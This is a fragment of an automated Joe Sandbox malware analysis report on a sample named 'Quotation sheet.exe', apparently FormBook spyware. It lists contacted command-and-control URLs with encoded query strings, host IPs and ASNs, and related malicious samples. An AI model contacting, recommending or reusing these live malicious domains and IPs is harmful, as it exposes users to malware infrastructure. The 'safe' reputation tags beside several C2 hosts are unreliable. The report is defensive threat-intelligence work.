                                              http://www.rtpterbaruwaktu3.xyz/7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.smartcongress.net/11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mrpokrovskii.pro/2pji/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ytsd88.top/egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.70kdd.top/klhq/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.acond-22-mvr.click/w9z4/false
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.llljjjiii.shop/rsvy/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ampsamkok88.shop/huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.matteicapital.online/hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.acond-22-mvr.click/w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI=false
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.ampsamkok88.shop/huvt/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.70kdd.top/klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mrpokrovskii.pro/2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ytsd88.top/egqi/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.llljjjiii.shop/rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OTfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.matteicapital.online/hyyd/false
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabpcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://dts.gnpge.comUsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://i3.cdn-image.com/__media__/pics/28903/search.png)pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.consentmanager.netpcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.bt.cn/?from=404pcaui.exe, 00000009.00000002.3974069413.000000000631E000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.000000000375E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.compcaui.exe, 00000009.00000002.3974069413.0000000005E68000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000032A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.ampsamkok88.shopUsMxwwTDRUHSSD.exe, 0000000B.00000002.3973090704.0000000002810000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://delivery.consentmanager.netpcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.mgm.gov.tr/?il=manisaQuotation sheet.exefalse
                                                                                      		high
                                                                                      http://i3.cdn-image.com/__media__/pics/29590/bg1.png)pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHKOQuotation sheet.exe, 00000000.00000002.2338419650.0000000003371000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1Spcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=nspcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.trtworld.com/#frmActiveBrowsersQuotation sheet.exefalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOFpcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://i3.cdn-image.com/__media__/js/min.js?v2.3pcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.Matteicapital.onlinepcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmbQuotation sheet.exefalse
                                                                                                                    		high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000009.00000002.3976227642.0000000008448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.onlinepcaui.exe, 00000009.00000002.3976087994.0000000008130000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.00000000064B0000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.00000000038F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      146.88.233.115
                                                                                                                      		smartcongress.netFrance
                                                                                                                      		53589PLANETHOSTER-8CAfalse
                                                                                                                      103.21.221.87
                                                                                                                      		rtpterbaruwaktu3.xyzunknown
                                                                                                                      		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                                      8.210.114.150
                                                                                                                      		www.llljjjiii.shopSingapore
                                                                                                                      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                      47.76.213.197
                                                                                                                      		www.ytsd88.topUnited States
                                                                                                                      		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                                      199.59.243.227
                                                                                                                      		www.acond-22-mvr.clickUnited States
                                                                                                                      		395082BODIS-NJUSfalse
                                                                                                                      208.91.197.27
                                                                                                                      		www.matteicapital.onlineVirgin Islands (BRITISH)
                                                                                                                      		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                      38.47.232.124
                                                                                                                      		70kdd.topUnited States
                                                                                                                      		174COGENT-174USfalse
                                                                                                                      194.85.61.76
                                                                                                                      		www.mrpokrovskii.proRussian Federation
                                                                                                                      		48287RU-CENTERRUfalse
                                                                                                                      172.67.209.48
                                                                                                                      		www.ampsamkok88.shopUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1562984
                                                                                                                      Start date and time:2024-11-26 11:15:39 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 9m 15s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Quotation sheet.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@12/7@12/9
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 75%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 92%
                                                                                                                      • Number of executed functions: 209
                                                                                                                      • Number of non-executed functions: 283
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Quotation sheet.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      No simulations

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      146.88.233.115Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.smartcongress.net/qtfx/
                                                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.smartcongress.net/11t3/
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.smartcongress.net/11t3/
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.smartcongress.net/11t3/
                                                                                                                      103.21.221.87CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.rtpterbaruwaktu3.xyz/mv7p/
                                                                                                                      P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.rtpterbaruwaktu3.xyz/v6un/
                                                                                                                      8.210.114.150PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.llljjjiii.shop/rsvy/
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.llljjjiii.shop/rsvy/
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.llljjjiii.shop/rsvy/
                                                                                                                      47.76.213.197CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ytsd88.top/8qt7/
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ytsd88.top/8qt7/
                                                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ytsd88.top/egqi/
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ytsd88.top/egqi/
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ytsd88.top/egqi/

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      www.ampsamkok88.shopPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 172.67.209.48
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 172.67.209.48
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 172.67.209.48
                                                                                                                      www.llljjjiii.shopPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 8.210.114.150
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 8.210.114.150
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 8.210.114.150
                                                                                                                      www.ytsd88.topCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 47.76.213.197
                                                                                                                      www.mrpokrovskii.proPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 109.70.26.37
                                                                                                                      www.acond-22-mvr.clickPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 199.59.243.227
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 199.59.243.227
                                                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 199.59.243.227
                                                                                                                      www.matteicapital.onlinePO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 208.91.197.27
                                                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 208.91.197.27
